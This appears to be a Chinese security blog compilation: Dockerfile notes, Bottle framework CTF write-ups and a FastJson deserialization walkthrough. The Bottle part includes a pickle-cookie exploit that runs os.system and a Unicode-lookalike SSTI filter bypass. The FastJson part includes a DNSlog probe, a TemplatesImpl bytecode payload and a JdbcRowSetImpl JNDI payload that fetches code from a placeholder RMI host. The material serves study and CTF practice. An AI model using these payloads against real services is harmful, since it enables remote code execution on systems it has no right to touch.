LABEL version="1.0" description="这是一个Web服务器" by="IT笔录"
```
使用LABEL指定元数据时，一条LABEL指定可以指定一或多条元数据，指定多条元数据时不同元数据之间通过空格分隔。推荐将所有的元数据通过一条LABEL指令指定，以免生成过多的中间镜像。

ENV：设置环境变量

格式：

ENV <key> <value>   #<key>之后的所有内容均会被视为其<value>的组成部分.因此，这样写一次只能设置一个变量ENV <key>=<value> ...  #可以设置多个变量，每个变量为一个"<key>=<value>"的键值对，如果<key>中包含空格，可以使用\来进行转义，也可以通过""来进行标示；另外，反斜线也可以用于续行

示例:

ENV myName John DoeENV myDog Rex The DogENV myCat=fluffy

EXPOSE:指定于外界交互的端口
格式:
```
EXPOSE <port> [<port>...]
```
示例:
```
EXPOSE 80 443EXPOSE 8080EXPOSE 11211/tcp 11211/udp
```
EXPOSE并不会让容器的端口访问到主机。要使其可访问，需要在docker run运行容器时通过-p来发布这些端口:
```
docker run -p 8080:80 nginx # 将容器的80端口映射到宿主机的8080端口
```
VOLUME：用于指定持久化目录
格式：
```
VOLUME ["/path/to/dir"]
```
示例:
```
VOLUME ["/data"]VOLUME ["/var/www", "/var/log/apache2", "/etc/apache2"
```
一个卷可以存在于一个或多个容器的指定目录，该目录可以绕过联合文件系统，并具有以下功能：
- 卷可以容器间共享和重用
- 容器并不一定要和其它容器共享卷
- 修改卷后会立即生效
- 对卷的修改不会对镜像产生影响
- 卷会一直存在，直到没有任何容器在使用它
在Docker中，持久化存储是指在容器重启或删除后，数据仍然存在的方法。Docker提供了多种持久化存储方式，主要包括Volumes、Bind Mounts和Tmpfs
WORKDIR：设定工作目录
格式：
```
WORKDIR /path/to/workdir
```
示例:
```
WORKDIR /a  (这时工作目录为/a)WORKDIR b  (这时工作目录为/a/b)WORKDIR c  (这时工作目录为/a/b/c)# 可知,多次使用该指令会叠加影响而非重置
```
通过WORKDIR设置工作目录后，Dockerfile中其后的命令RUN、CMD、ENTRYPOINT、ADD、COPY等命令都会在该目录下执行。在使用docker run运行容器时，可以通过-w参数覆盖构建时所设置的工作目录。
USER:指定运行容器时的用户
可以指定用户名或UID，后续的RUN也会使用指定用户。使用USER指定用户时，可以使用用户名、UID或GID，或是两者的组合。当服务不需要管理员权限时，可以通过该命令指定运行用户。并且可以在之前创建所需要的用户
格式：
```
USER userUSER user:groupUSER uidUSER uid:gidUSER user:gidUSER uid:group
```
示例:
```
USER www
```
使用USER指定用户后，Dockerfile中其后的命令RUN、CMD、ENTRYPOINT都将使用该用户。镜像构建完成后，通过docker run运行容器时，可以通过-u参数来覆盖所指定的用户。
ARG：用于指定传递给构建运行时的变量
格式：
```
ARG <name>[=<default value>]
```
示例:
```
ARG siteARG build_user=www
```
ONBUILD：用于设置镜像触发器
当所构建的镜像被用做其它镜像的基础镜像，该镜像中的触发器将会被触发
格式:
```
ONBUILD [INSTRUCTION]
```
示例:
```
ONBUILD ADD . /app/srcONBUILD RUN /usr/local/bin/python-build --dir /app/src
```

参考~🥰:
Docker入门教程
dockerfile文件使用方法
[Docker]之删除多余的中间镜像

bottle框架的一些特性

2025-04-12T13:18:44.000Z

#bottle框架的简介

Bottle 是一个非常轻量级的 Python Web 框架，适合用于构建简单的 Web 应用和 RESTful API。Bottle 的最大特点之一是它的单文件设计，意味着你只需一个文件 bottle.py 即可使用整个框架，而不需要安装其他依赖。

最简示例：

# 导入本地的 bottle.py 文件from bottle import route, run# 定义路由及处理函数@route('/hello')def hello():    return "Hello, World!"# 启动应用run(host='localhost', port=8080)

这样就能非常迅速的启动一个服务了。在大多语法上也和flask差不多，就不多讲了。

主要是讲三个点：

框架模板的渲染机制
cookie处理机制
“斜体字”绕过的trick

#框架模板的渲染机制

这里先简要的介绍语法,之后详述机制。

默认模板语法使用语法符号为 <% %> % {{ }}

<% %>用来放置多行代码
%用来放置单行代码
{{ }}用来放置变量

和其他的模板一样，如果将一些用户输入直接渲染或者waf不到位(比如NCTF的ez_dash的非预期就是没有waf %)，将会引发ssti，这里不再赘叙。

本部分参考：SEKAICTF 2022 Web Writeup by eking

首先说结论，如果用bottle的get_cookie函数来解析cookie的话，是会触发pickle的反序列化的，后果就是有空可钻了。

源码如下：

def get_cookie(self, key, default=None, secret=None, digestmod=hashlib.sha256):        """ Return the content of a cookie. To read a `Signed Cookie`, the            `secret` must match the one used to create the cookie (see            :meth:`BaseResponse.set_cookie`). If anything goes wrong (missing            cookie or wrong signature), return a default value. """        value = self.cookies.get(key)        if secret:            # See BaseResponse.set_cookie for details on signed cookies.            if value and value.startswith('!') and '?' in value:                sig, msg = map(tob, value[1:].split('?', 1))                hash = hmac.new(tob(secret), msg, digestmod=digestmod).digest()                if _lscmp(sig, base64.b64encode(hash)):                    dst = pickle.loads(base64.b64decode(msg))                    if dst and dst[0] == key:                        return dst[1]            return default        return value or default

解析流程如下：

首先得到cookies中的值
判断是否存在secret参数，也就是检验是否存在签名密钥。若不存在，直接返回值；若存在，则开始下一步
检验格式：以!开头并且其中包含?的cookie值才有效，否则直接返回deflaut。
将值拆分为签名sig和消息msg并使用secret对msg进行HMAC哈希计算（算法由digestmod指定，默认SHA256）。再使用_lscmp对比生成的哈希与Cookie中的签名，验证签名是否有效。
然后问题来了，如果验证通过，则直接对msg进行Base64解码并用pickle反序列化数据。不论后面如何，只要能到这一步，就能干些坏事了。

这时候就该掏出XYCTF的题目来玩玩看了。给了源码：

# -*- encoding: utf-8 -*-'''@File    :   main.py@Time    :   2025/03/28 22:20:49@Author  :   LamentXU ''''''flag in /flag_{uuid4}'''from bottle import Bottle, request, response, redirect, static_file, run, routewith open('../../secret.txt', 'r') as f:    secret = f.read()app = Bottle()@route('/')def index():    return '''HI'''@route('/download')def download():    name = request.query.filename    if '../../' in name or name.startswith('/') or name.startswith('../') or '\\' in name:        response.status = 403        return 'Forbidden'    with open(name, 'rb') as f:        data = f.read()    return data@route('/secret')def secret_page():    try:        session = request.get_cookie("name", secret=secret)        if not session or session["name"] == "guest":            session = {"name": "guest"}            response.set_cookie("name", session, secret=secret)            return 'Forbidden!'        if session["name"] == "admin":            return 'The secret has been deleted!'    except:        return "Error!"run(host='0.0.0.0', port=8080, debug=False)

可以发现存在一个secret.txt文件，但是有点小小的waf，这个waf非常好绕，详见以下复现：

这样就可以拿到密钥，也就可以继续接下来的pickle反序列化利用了。下面用了eking学长的板子：

# cookie.pyfrom bottle import route, run,responseimport ossecret = "Hell0_H@cker_Y0u_A3r_Sm@r7"class exp():    def __reduce__(self):        cmd = "ls"        return (os.system, (cmd,))@route("/sign")def index():    try:        session = exp()        response.set_cookie("name", session, secret=secret)        return "success"    except:        return "pls no hax"if __name__ == "__main__":    os.chdir(os.path.dirname(__file__))    run(host="0.0.0.0", port=8081)

访问本地8081端口就能拿到恶意制造的cookies。先尝试一个calc(windows上起服务)：

再尝试将flag中的内容转录自可以访问到的名称:

cmd = "cat flag* > flag"# 方便起见，把flag放在了以上路径，在根目录时同理

在复现时的一个要注意的地方：
在复现的时候发现linux起的服务会一直error，但是windows就不会。为了搞清楚问题所在，把main.py的try去掉使之报错，会报“No moudle named “nt”，众所周知nt是只有在windows中有的py库，那就很神奇了，bottle也没有调用，main也没有调用，怎么回事呢？
其实是因为得到恶意cookie需要起服务来拿cookie，而我是在win上起的，导致生成的cookie和linux上起服务是不一样的(大概python对于两个系统有做差分)。只要在linux上起cookie服务就能解决这个问题。或者考虑直接生成cookie而非利用服务来间接拿到cookie,前提是知道cookie生成的原理。

#“斜体字”绕过的trick

本部分参考：聊聊bottle框架中由斜体字引发的模板注入（SSTI）waf bypass

#什么是斜体字？

这里的斜体字指的是“一个字符的斜体字符集”，主要指的是Decomposition后为同一个字符的字符集。即https://www.compart.com/en/unicode中，假设我们输入`a`，可以看到：

而在bottle框架里，这些斜体字也会直接被识别为其对应的原字符，下面给出一个POC：

# -*- encoding: utf-8 -*-'''@File    :   app.py@Time    :   2025/03/29 15:52:17@Author  :   LamentXU '''import bottle@bottle.route('/')def index():    return 'Hello, World!'@bottle.route('/attack')def attack():    payload = bottle.request.query.get('payload')    print(payload)    return bottle.template('hello '+payload)    else:        bottle.abort(400, 'Invalid payload')if __name__ == '__main__':    bottle.run(host='0.0.0.0', port=5000)

来做个简单的测试：

可见，bottle的模板渲染会直接把%aa当成a，而且可以直接当成普通的a使用。那么为何能如此渲染？

#原理解析

为什么斜体字没有被转换为其他字符，就可以被正常的运行呢？这就要聊到python的机制了。假如直接exec()任意code的话，python会把code中当作代码处理的斜体字根据Decomposition转成对应的ASCII字符（当作字符串处理的除外，它们仍会是原本的斜体字）。

#bottle的渲染机制

而传入模板中的斜体字能被渲染对应的非斜体字的前提是没有被处理为其他字符或者非法字符。研究源码的时候到了，来看看bottle的template方法怎么写的：

def template(*args, **kwargs):    """    Get a rendered template as a string iterator.    You can use a name, a filename or a template string as first parameter.    Template rendering arguments can be passed as dictionaries    or directly (as keyword arguments).    """    tpl = args[0] if args else None    for dictarg in args[1:]:        kwargs.update(dictarg)    adapter = kwargs.pop('template_adapter', SimpleTemplate)    lookup = kwargs.pop('template_lookup', TEMPLATE_PATH)    tplid = (id(lookup), tpl)    if tplid not in TEMPLATES or DEBUG:        settings = kwargs.pop('template_settings', {})        if isinstance(tpl, adapter):            TEMPLATES[tplid] = tpl            if settings: TEMPLATES[tplid].prepare(**settings)        elif "\n" in tpl or "{" in tpl or "%" in tpl or '$' in tpl:            TEMPLATES[tplid] = adapter(source=tpl, lookup=lookup, **settings)        else:            TEMPLATES[tplid] = adapter(name=tpl, lookup=lookup, **settings)    if not TEMPLATES[tplid]:        abort(500, 'Template (%s) not found' % tpl)    return TEMPLATES[tplid].render(kwargs)

当bottle在渲染模板时会先将标识符({,%,$)识别出来之后做一些整理（prepare之类），随后丢给SimpleTemplate类。使用render()作为渲染的入口函数：

def render(self, *args, **kwargs):     """ Render the template using keyword arguments as local variables. """     env = {}     stdout = []     for dictarg in args:         env.update(dictarg)     env.update(kwargs)     self.execute(stdout, env)     return ''.join(stdout)

将输入的变量update到env后，将env，stdout作为参数投入execute运行。接着看看execute怎么写的：

def execute(self, _stdout, kwargs):     env = self.defaults.copy()     env.update(kwargs)     env.update({         '_stdout': _stdout,         '_printlist': _stdout.extend,         'include': functools.partial(self._include, env),         'rebase': functools.partial(self._rebase, env),         '_rebase': None,         '_str': self._str,         '_escape': self._escape,         'get': env.get,         'setdefault': env.setdefault,         'defined': env.__contains__     })     exec(self.co, env)     if env.get('_rebase'):         subtpl, rargs = env.pop('_rebase')         rargs['base'] = ''.join(_stdout)  #copy stdout         del _stdout[:]  # clear stdout         return self._include(env, subtpl, **rargs)     return env

这段代码先将kwargs(这里就是原来传入的env)更新到内部的env变量，再设定了一堆属性，最后然后将其作为全局命名空间执行self.co。这个self.co实质上是通过compile()函数编译而成的代码字节对象，可以通过exec直接执行，在这里它是这样实现的:

@cached_propertydef co(self):    return compile(self.code, self.filename or '', 'exec')

编译了self.code，我们接着跟进：

@cached_propertydef code(self):    source = self.source  # 尝试获取已缓存的模板内容    if not source:        # 如果没有预先加载的模板内容        with open(self.filename, 'rb') as f:  # 以二进制模式打开模板文件            source = f.read()  # 读取原始字节内容    try:        source, encoding = touni(source), 'utf8'  # 尝试转换为Unicode    except UnicodeError:        raise depr(0, 11, 'Unsupported template encodings.', 'Use utf-8 for templates.')    parser = StplParser(          # 创建模板语法解析器    source,                   # 统一后的Unicode文本    encoding=encoding,        # 编码标记（固定为utf8）    syntax=self.syntax        # 可选的语法变体设置    )    code = parser.translate()     # 生成可执行的Python代码    self.encoding = parser.encoding  # 保存实际检测到的编码    return code

从这里不难看出source大概就是我们所输入到template函数中的内容了，他会首先尝试获取缓存的模板，若没有就会尝试将source视作文件来寻找模板。我们也可以在这里放一个print来看看到底是不是，这里就不演示了，原博主那里是有演示的。

这里还有个touni对source做了处理，来看看它是干什么的：

def touni(s, enc='utf8', err='strict'):    if isinstance(s, bytes):        return s.decode(enc, err)    return unicode("" if s is None else s)

即如果source是字节类型则对其解码，如果不是，则将source变为unicode类型，这里的unicode类型其实就是str：

unicode = str

好，这边就没什么东西了。回到code的定义，之后将source作为参数传给StplParser进行实例化，StplParser是bottle的模板语法解释器，同时规定了编码形式。然后调用translate方法来将字符串转化为代码形式，来看看它的实现：

def translate(self):    if self.offset: raise RuntimeError('Parser is a one time instance.')    while True:        m = self.re_split.search(self.source, pos=self.offset)        if m:            text = self.source[self.offset:m.start()]            self.text_buffer.append(text)            self.offset = m.end()            if m.group(1):  # Escape syntax                line, sep, _ = self.source[self.offset:].partition('\n')                self.text_buffer.append(self.source[m.start():m.start(1)] +                                        m.group(2) + line + sep)                self.offset += len(line + sep)                continue            self.flush_text()            self.offset += self.read_code(self.source[self.offset:],                                          multiline=bool(m.group(4)))        else:            break    self.text_buffer.append(self.source[self.offset:])    self.flush_text()    return ''.join(self.code_buffer)

这里关注self.flush_text()：

def flush_text(self):    text = ''.join(self.text_buffer)    del self.text_buffer[:]    if not text: return    parts, pos, nl = [], 0, '\\\n' + '  ' * self.indent    for m in self.re_inl.finditer(text):        prefix, pos = text[pos:m.start()], m.end()        if prefix:            parts.append(nl.join(map(repr, prefix.splitlines(True))))        if prefix.endswith('\n'): parts[-1] += nl        parts.append(self.process_inline(m.group(1).strip()))    if pos < len(text):        prefix = text[pos:]        lines = prefix.splitlines(True)        if lines[-1].endswith('\\\\\n'): lines[-1] = lines[-1][:-3]        elif lines[-1].endswith('\\\\\r\n'): lines[-1] = lines[-1][:-4]        parts.append(nl.join(map(repr, lines)))    code = '_printlist((%s,))' % ', '.join(parts)    self.lineno += code.count('\n') + 1    self.write_code(code)

他会把我们的代码块规范化了一下。并调用了一些exec全局空间里的内置函数（比如_printlist）假设我们的模板是hello {{hello world}}，经过translate()后变为：

_printlist(('hello ', _escape(hello world),))

这个_printlist就是在exec执行的全局空间里的打印函数。我们回顾一下：

env.update({    '_stdout': _stdout,    '_printlist': _stdout.extend,    'include': functools.partial(self._include, env),    'rebase': functools.partial(self._rebase, env),    '_rebase': None,    '_str': self._str,    '_escape': self._escape,    'get': env.get,    'setdefault': env.setdefault,    'defined': env.__contains__})

可以看到'_printlist': _stdout.extend,，好的，我们了解了translate()的大致用途了。我们接下来来看flush_text()，存在如下代码：

parts.append(self.process_inline(m.group(1).strip()))

每一行模板都会经过一次self.process_inline()，跟进：

@staticmethoddef process_inline(chunk):    if chunk[0] == '!': return '_str(%s)' % chunk[1:]    return '_escape(%s)' % chunk

终于，出现了与转码有关的_escape函数。我们对照刚才回顾的exec执行的全局空间。我们看到：'_escape': self._escape,。我们去找SimpleTemplate类的self._escape看看。还记得每一次进入SimpleTemplate都有一次初始化吗，就是prepare函数这些，我们来看：

def prepare(self,            escape_func=html_escape,            noescape=False,            syntax=None, **ka):    self.cache = {}    enc = self.encoding    self._str = lambda x: touni(x, enc)    self._escape = lambda x: escape_func(touni(x, enc))    self.syntax = syntax    if noescape:        self._str, self._escape = self._escape, self._str

可以看到初始化了self._escape = lambda x: escape_func(touni(x, enc))

，来看escape_func()。

escape_func=html_escape,

看定义在全局空间的html_escape()：

def html_escape(string):    """ Escape HTML special characters ``&<>`` and quotes ``'"``. """    return string.replace('&', '&').replace('<', '<').replace('>', '>')\                 .replace('"', '"').replace("'", ''')

将一些可能在XSS用到的字符进行转码，就是一个防止XSS的HTML编码函数。

至此我们得出结论：我们的输入，不论在不在{{}}里，经过唯一的编码检查就是对source的touni()，但是由于全局变量中的unicode在python3下是全体str，这就导致了我们可以输入斜体字符，它们仍然会被当作其对应的非斜体字符处理。

#利用限制

由于这些斜体字没法直接以原文的形式进行网络传输，所以在传输的时候是必定要进行url编码的。

刚开始看到这篇文章时想的是，用burp或者apifox直接发明文能否解决这个问题呢？事实上也是不行的，因为传过去解析的时候由于没有编码会直接乱码(

所以现在能这么利用的也就只有a可以用%aa来代替，o可以用%ba来代替，使用范围比较狭窄。当然，如果可以通过上传文件等形式上传pl的话，就完全没有这个问题了。

FastJson反序列化

2025-03-19T14:48:41.000Z

本文抄录自FastJson反序列化漏洞复现，有一些补充知识和解释。原文是Ec3o学长的文章，超级好懂❀

在本文章之前，强烈建议优先学习JNDI，JDBC的相关知识。

#概述

Fastjson是阿里巴巴的开源 JSON 解析库，它可以解析 JSON 格式的字符串，支持将 Java Object序列化为 JSON 字符串，也可以从 JSON 字符串反序列化到 Java Object.

Fastjson 提供了两个主要接口来分别实现对于Java Object的序列化和反序列化操作。

JSON.toJSONString：序列化
JSON.parseObject/JSON.parse：反序列化

对于Fastjson来讲，并不是所有的Java对象都能被转为JSON，只有Java Bean格式的对象才能Fastjson被转为JSON。

#什么是JavaBean？

JavaBean是一种特殊的 Java 类，它符合一组标准的命名和设计规则，旨在便于使用和集成在各种 Java 应用程序中，尤其是在图形化界面构建工具和框架中。JavaBean 最常用于**数据传输对象 (DTO)**，通常作为简单的容器类，用于封装和传递数据。

一般来说我们的Java Bean要有一个无参构造函数和一些私有的成员变量，附加一些公共的getter和setter方法来访问这些属性，也可以附带一些以isType设计的bool属性方法。

Serializable接口可选，用于实现反序列化.这样的一个Java Bean常常用于数据封装使用。

import java.io.Serializable;public class User implements Serializable {    private String name;    private int age;    // 无参构造器    public User() {}    // 带参构造器    public User(String name, int age) {        this.name = name;        this.age = age;    }    // Getter方法    public String getName() {        return name;    }    // Setter方法    public void setName(String name) {        this.name = name;    }    // Getter方法    public int getAge() {        return age;    }    // Setter方法    public void setAge(int age) {        this.age = age;    }    @Override    public String toString() {        return "User{name='" + name + "', age=" + age + "}";    }}

#Fastjson中的序列化和反序列化

序列化：

String text = JSON.toJSONString(obj);

反序列化：

VO vo = JSON.parse();  //解析为JSONObject类型或者JSONArray类型VO vo = JSON.parseObject("{...}");  //JSON文本解析成JSONObject类型VO vo = JSON.parseObject("{...}", VO.class);  //JSON文本解析成VO.class类

JsonObject和JsonArray是Fastjson内置的无害默认类，未指定解析的类以及json数组会被自动解析到该类上.对于类中private类型的属性值，Fastjson默认不会将其序列化和反序列化。

#反序列化到对应的类

fastjson中反序列化到对应的类有两种方法，一种是在parse的时候指定要解析到的类(上例中的第三个例子)，一种是通过一种叫做@type的属性来自动反序列化到@type指定的类。

package org.example;public class CTF {    private String flag;    private String team;    private int ID;    public CTF() {    }    public String getFlag() {        return flag;    }    public void setFlag(String flag) {        this.flag = flag;    }    public String getTeam() {        return team;    }    public void setTeam(String team) {        this.team = team;    }    public int getID() {        return ID;    }    public void setID(int ID) {        this.ID = ID;    }}

package org.example;import com.alibaba.fastjson.JSON;import com.alibaba.fastjson.serializer.SerializerFeature;import org.example.CTF;public class Fastjson_Test {    public static void main(String[] args) {        CTF ctf = new CTF();        ctf.setTeam("Faster");        ctf.setID(1);        ctf.setFlag("flag{test}");                                                        System.out.println(JSON.toJSONString(ctf,SerializerFeature.WriteClassName));    }}// SerializerFeature用于控制序列化的细节，这里的writeClassName是用来把类名也包含在序列化后字符串中的设定。

输出：

{"@type":"org.example.CTF","flag":"flag{test}","iD":1,"team":"Faster"}

可见，Fastjson在JSON字符串中添加了一个@type字段，用于标识对象所属的类。

package org.example;import com.alibaba.fastjson.JSON;import com.alibaba.fastjson.parser.ParserConfig;public class Fastjson_Test {    public static void main(String[] args) {        ParserConfig.getGlobalInstance().addAccept("org.example.");        String JSON_CTF = "{\"@type\":\"org.example.CTF\",\"flag\":\"flag{test}\",\"iD\":1,\"team\":\"Faster\"}";        System.out.println(JSON.parseObject(JSON_CTF, CTF.class));    }}// 设定ParserConfig避免报autoType is not support.，也就是添加autoType白名单。

输出：

org.example.CTF@7e32c033

#Fastjson反序列化流程分析

一个bean的属性只能通过getter和setter来进行设定，我们不难猜测在反序列化的过程中会调用指定类的setter来进行属性赋值。

修改一个我们要指定的反序列化的类的setter和getter,让它进行最直观的操作——弹计算器和任务管理器。

package org.example;import java.io.IOException;public class Calc {    public String calc;    public Calc() {        System.out.println("调用了构造函数");    }    public String getCalc() throws IOException {        System.out.println("调用了getter");        Runtime.getRuntime().exec("calc");        return calc;    }    public void setCalc(String calc) throws IOException {        this.calc = calc;        Runtime.getRuntime().exec("taskmgr");        System.out.println("调用了setter");    }}

事实证明在走序列化和反序列化的流程中都会调用目标类的Setter和Getter和构造函数,所以我们的目标就是找一个带有可控恶意参数的getter和setter或是构造函数来实现反序列化攻击。

阅读源码发现，FastJson在通过@type获取类之后，通过反射拿到该类所有的方法存入methods，接下来遍历methods进而获取getter、setter方法。

setter的查找方式：

方法名长度大于4
非静态方法
返回值为void或当前类
方法名以set开头
参数个数为1

getter的查找方式：

方法名长度大于等于4
非静态方法
以get开头且第4个字母为大写
无传入参数
返回值类型继承自Collection Map AtomicBoolean AtomicInteger AtomicLong

#DnsLog探测

为了确定某个服务确实存在fastjson反序列化漏洞，首先应该进行试探性的探测，比如利用它来进行Dnslog探测。就直接拿final的题来试试吧：

@PostMapping({"/parse"})    public String parseJson(@RequestBody String json) {        Object obj = JSON.parseObject(json);        return "Parsed: " + obj.getClass().getName();    }

向/parse发送post，body如下：

{  "a": {    "@type": "java.net.Inet4Address",    "val": "test.Your.dnslog.url"  }}// 由于fastjson1.2.25及以上的版本的autotype默认为false，要套一层json来防止请求被拦

会得到响应：

Parsed: com.alibaba.fastjson.JSONObject

并且可以发现确实进行了一次DNS查询。

InnetAddress类有一个getter方法，用于查询真实的IP地址，落到实处也就是进行了一次DNS查询，从而可以进行目标能否进行攻击的探测。

private static InetAddress[] getAddressesFromNameService(String host, InetAddress reqAddr)    throws UnknownHostException{    InetAddress[] addresses = null;    boolean success = false;    UnknownHostException ex = null;    if ((addresses = checkLookupTable(host)) == null) {        try {            for (NameService nameService : nameServices) {                 try {                    addresses = nameService.lookupAllHostAddr(host);                    success = true;                    break;                } catch (UnknownHostException uhe) {                    if (host.equalsIgnoreCase("localhost")) {                        InetAddress[] local = new InetAddress[] { impl.loopbackAddress() };                        addresses = local;                        success = true;                        break;                    }                    else {                        addresses = unknown_array;                        success = false;                        ex = uhe;                    }                }            }            if (reqAddr != null && addresses.length > 1 && !addresses[0].equals(reqAddr)) {                int i = 1;                for (; i < addresses.length; i++) {                    if (addresses[i].equals(reqAddr)) {                        break;                    }                }                if (i < addresses.length) {                    InetAddress tmp, tmp2 = reqAddr;                    for (int j = 0; j < i; j++) {                        tmp = addresses[j];                        addresses[j] = tmp2;                        tmp2 = tmp;                    }                    addresses[i] = tmp2;                }            }            cacheAddresses(host, addresses, success);            if (!success && ex != null)                throw ex;        } finally {            updateLookupTable(host);        }    }    return addresses;}

#漏洞复现

#Fastjson <= 1.2.24

#TemplatesImpl利用链

Java 9 及后续版本的模块系统限制了对JDK内部模块的访问，因此不好进行攻击。下列代码在Java 8环境下复现

com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl这个类中定义了一个内部类

TransletClassLoader,其中defineClass没有限制作用域,可以直接被外部调用。

static final class TransletClassLoader extends ClassLoader {    private final Map _loadedExternalExtensionFunctions;     TransletClassLoader(ClassLoader parent) {         super(parent);        _loadedExternalExtensionFunctions = null;    }    TransletClassLoader(ClassLoader parent,Map mapEF) {        super(parent);        _loadedExternalExtensionFunctions = mapEF;    }    public Class loadClass(String name) throws ClassNotFoundException {        Class ret = null;        // The _loadedExternalExtensionFunctions will be empty when the        // SecurityManager is not set and the FSP is turned off        if (_loadedExternalExtensionFunctions != null) {            ret = _loadedExternalExtensionFunctions.get(name);        }        if (ret == null) {            ret = super.loadClass(name);        }        return ret;     }    /**     * Access to final protected superclass member from outer class.     */    Class defineClass(final byte[] b) {        return defineClass(null, b, 0, b.length);    }}

这个类里重写了 defineClass 方法，并且这里没有显式地声明其定义域。Java中默认情况下，如果一个方法没有显式声明作用域，其作用域为default。所以也就是说这里的 defineClass 由其父类的protected类型变成了一个default类型的方法，可以被类外部调用。

向前追溯的调用链如下:

TemplatesImpl#getOutputProperties() -> TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses() -> TransletClassLoader#defineClass()

其中getOutputProperties属于getter方法，在fastjson里会被直接调用:

{    "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",    "_bytecodes": [        "<恶意字节码-base64>"    ],    "_name": "a.b",    "_tfactory": {},    "_outputProperties": {}}

对于以上payload，给出以下解释：

_tfactory:在调用TemplatesImpl利用链时，defineTransletClasses方法内部会通过_tfactory属性调用一个getExternalExtensionsMap方法，如果_tfactory属性为null则会抛出异常，无法根据_bytecodes属性的内容加载并实例化恶意类
_name:getTransletInstance方法中判断if (_name == null) return null; 所以要给_name赋值（String）
_outputProperties:json数据在反序列化时会调用TemplatesImpl类的getOutputProperties方法触发利用链，可以理解为_outputProperties属性的作用就是为了调用getOutputProperties方法。
由于更改的一些TemplatesImpl私有变量没有setter方法，需要使用 Feature.SupportNonPublicField参数(在反序列化执行函数中，请看后例)。也正是因此，TemplatesImpl这条链的泛用性不强(
fastjson在反序列化时，如果Field类型为byte[]，将会调用com.alibaba.fastjson.parser.JSONScanner#bytesValue进行base64解码，对应的，在序列化时也会进行base64编码

恶意字节码就是写一个能弹计算器的类，编译成class然后把字节流再base64一下导出来。

shell命令：base64 exp.class即可。

#JdbcRowSetImpl利用链

private Connection connect() throws SQLException {        // Get a JDBC connection.        // First check for Connection handle object as such if        // "this" initialized  using conn.        if(conn != null) {            return conn;        } else if (getDataSourceName() != null) {            // Connect using JNDI.            try {                Context ctx = new InitialContext();                DataSource ds = (DataSource)ctx.lookup                    (getDataSourceName());                //return ds.getConnection(getUsername(),getPassword());                if(getUsername() != null && !getUsername().equals("")) {                     return ds.getConnection(getUsername(),getPassword());                } else {                     return ds.getConnection();                }            }            catch (javax.naming.NamingException ex) {                throw new SQLException(resBundle.handleGetObject("jdbcrowsetimpl.connect").toString());            }        } else if (getUrl() != null) {            // Check only for getUrl() != null because            // user, passwd can be null            // Connect using the driver manager.            return DriverManager.getConnection                    (getUrl(), getUsername(), getPassword());        }        else {            return null;        }    }public String getDataSourceName() {        return dataSource;    }

重点关注第16行的DataSource ds = (DataSource)ctx.lookup(getDataSourceName());以及getDataSourceName()函数.lookup函数可以触发JNDI的搜索,dataSource可控,则可以进行恶意JNDI的注入.

Connect方法里面调用了lookup方法，从这个类的dataSource变量获取URI，而这个URI我们是可控的.因此我们去看看哪里可以调用Connect方法:

public void setAutoCommit(boolean autoCommit) throws SQLException {      if(conn != null) {         conn.setAutoCommit(autoCommit);      } else {         conn = connect();         conn.setAutoCommit(autoCommit);      }  }

比较有意思的是这刚好是一个Setter方法，可以满足Fastjson触发的条件,并且数据源也可控.所以我们只需要反序列化一个JdbcRowSetImpl实例出来，设置它的dataSource属性就可以实现JNDI注入.

要注意的是JNDI注入对JDK版本号有限制，高版本JDKtrustURLCodebase变量默认设置为False.

public java.lang.Object lookup(Name name)        throws NamingException {            if (_nc == null)                throw new ConfigurationException(                    "Context does not have a corresponding NamingContext");            if (name.size() == 0 )                return this; // %%% should clone() so that env can be changed            NameComponent[] path = CNNameParser.nameToCosName(name);            java.lang.Object answer = null;            try {                answer = callResolve(path);                try {                    // Check whether object factory codebase is trusted                    if (CorbaUtils.isObjectFactoryTrusted(answer)) {                        answer = NamingManager.getObjectInstance(                            answer, name, this, _env);                    }                } catch (NamingException e) {                    throw e;                } catch (Exception e) {                    NamingException ne = new NamingException(                        "problem generating object using object factory");                    ne.setRootCause(e);                    throw ne;                }            } catch (CannotProceedException cpe) {                javax.naming.Context cctx = getContinuationContext(cpe);                return cctx.lookup(cpe.getRemainingName());            }            return answer;    }public static boolean isObjectFactoryTrusted(Object obj)        throws NamingException {        // Extract Reference, if possible        Reference ref = null;        if (obj instanceof Reference) {            ref = (Reference) obj;        } else if (obj instanceof Referenceable) {            ref = ((Referenceable)(obj)).getReference();        }        if (ref != null && ref.getFactoryClassLocation() != null &&                !CNCtx.trustURLCodebase) {            throw new ConfigurationException(                "The object factory is untrusted. Set the system property" +                " 'com.sun.jndi.cosnaming.object.trustURLCodebase' to 'true'.");        }        return true;    }

这里关注isObjectFactoryTrusted()函数,第44行处写明trustURLCodebase若为False则直接会抛出异常,而无法对传入的类实例化,也就无法攻击了(请看第15行的条件判断)

确定能攻击后，接下来就是准备外部RMI/LDAP攻击源和发送Payload的事情.写一个简单的EvilObject.java，弹个计算器来验证代码执行:

import java.io.IOException;public class EvilObject {    public EvilObject() {    }    static {        try {            Runtime.getRuntime().exec("calc");        } catch (IOException e) {            e.printStackTrace();        }    }}

使用javac编译成class，用python快速开启一个HTTP服务提供文件下载支持:

python -m http.server 8000

接下来是启动RMI服务器，这里用了一个快速便捷的Jar包，后面的参数是用来确定提供class的registry地址的，也可以加最后一个参数用来改变RMI端口号

Github Jar包下载

payload则类似于:

{    "@type": "com.sun.rowset.JdbcRowSetImpl",    "dataSourceName": "rmi://xxx.xxx.xxx.xxx:xxxx/EcilObject",    "autoCommit": "true"}

autoCommit属性设定了自动连接dataSourceName所指定的数据源进行连接.

注意java版本的可用性,在找现存的链子时要注意适用范围

Java安全学习笔记

2025-03-10T14:23:41.000Z

本文摘录自攻击Java Web应用-[Java Web安全],在一些顺序，细节上有所不同，有增加一些补充知识。

#Java基础

#Java反射机制

#什么是反射？

Java反射(Reflection)是Java非常重要的动态特性，通过使用反射我们不仅可以获取到任何类的成员方法(Methods)、成员变量(Fields)、构造方法(Constructors)等信息，还可以动态创建Java类实例、调用任意的类方法、修改任意的类成员变量值等。

所谓动态，就是并不根据源代码来创建类，而是可以根据诸如配置文件等外部信息来创建类或实例等。

Java 中，通常情况下，我们在编译时就已经确定了要使用的类、方法和属性。而反射机制打破了这种限制，它允许程序在运行时检查和操作类、对象、方法、字段等，无需在编译时知道这些元素的具体信息。

